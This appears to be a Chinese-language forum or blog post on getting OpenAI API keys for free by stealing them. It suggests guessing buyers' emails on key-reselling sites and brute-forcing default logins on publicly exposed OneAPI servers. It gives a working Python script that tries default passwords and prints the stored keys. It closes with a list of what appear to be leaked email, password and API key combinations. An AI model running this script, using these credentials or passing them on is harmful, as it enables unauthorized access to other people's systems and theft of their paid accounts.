白嫖OpenAPI APIKEY思路
思路一: 猜邮箱
找一些卖Key的发卡网站, 在订单查询中猜其他人购买的邮箱
https://eylink.cn/
https://nbfaka.com/ds/
常见的弱邮箱:
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
思路二: 爆破弱口令
爆破别人搭建好的OneAPI弱口令, OneAPI是OpenAI 接口管理 & 分发系统, 默认搭建完成后用户名是root密码是123456, 很多人部署到公网后不会修改默认密码, 所以可以直接爆破白嫖别人的APIKEY
项目地址: https://github.com/songquanpeng/one-api
可以使用OneAPI
这个关键字在测绘引擎查找别人部署在公网的示例, 然后将IP或者URL保存在url.txt
中, 即可自动爆破
一种爆破代码示例:
import requests
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
urls = []
def get_url():
with open('url.txt', 'r') as f:
for line in f:
urls.append(line.strip())
return urls
def try_login_and_get_token(url):
payloads = [{"username":"root","password":"123456"},
{"username":"admin","password":"123456"},
{"username":"root","password":"root"},
{"username":"admin","password":"admin"},
]
headers = {"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"}
session = requests.session()
session.headers = headers
for payload in payloads:
try:
if "用户名" in session.post(url + "/api/user/login", json=payload, timeout=1).text:
return
else:
dta = session.get(url + "/api/token/?p=0", timeout=1).json()['data']
if len(dta) != 0:
print(url)
for i in dta:
print("sk-" + i['key'])
print()
return
except:
pass
if __name__ == '__main__':
get_url()
for item in urls:
try_login_and_get_token(item)
API分享
kuoyeshokri4@hotmail.com----sChTPS32----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
[email protected]^K73n6CO----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
sipkemusodao@hotmail.com----UhxxiR98----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
[email protected]^ZZBfio----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
[email protected]^T----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
[email protected]!PCkYC----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
bnvexod@outlook.com----ZAQAfas616----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
nqmabqlgf@outlook.com----BSQtd5365----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
lqsgkgdaj@hotmail.com----RCTQsg591----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
vhszley@outlook.com----EREToyy6936----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
uikfrdkjkr@hotmail.com----ZDJmq053----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
ztkdqegb@hotmail.com----JRIUdld76----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
lynenwoconshand@mail.com----NtlHVqfgqd----7KJfPwayx----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
hasillegangti@mail.com----VqumZwcEeQ----cwpeu3ZHA----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
nrecarimneili@mail.com----prXIkKIkTP----jqHqSYYD7----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
coadilytoti@mail.com----RpDOFqltjS----0ydTkz8lc----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
fiddtovederon@mail.com----wQVaMCqrtP----QD5KWxzyR----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
sforlanloaphardist@mail.com----CAJrWQFwWN----tLe1dgbcZ----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
erofelitup@mail.com----DRUxgdhClX----QyR1r39Rc----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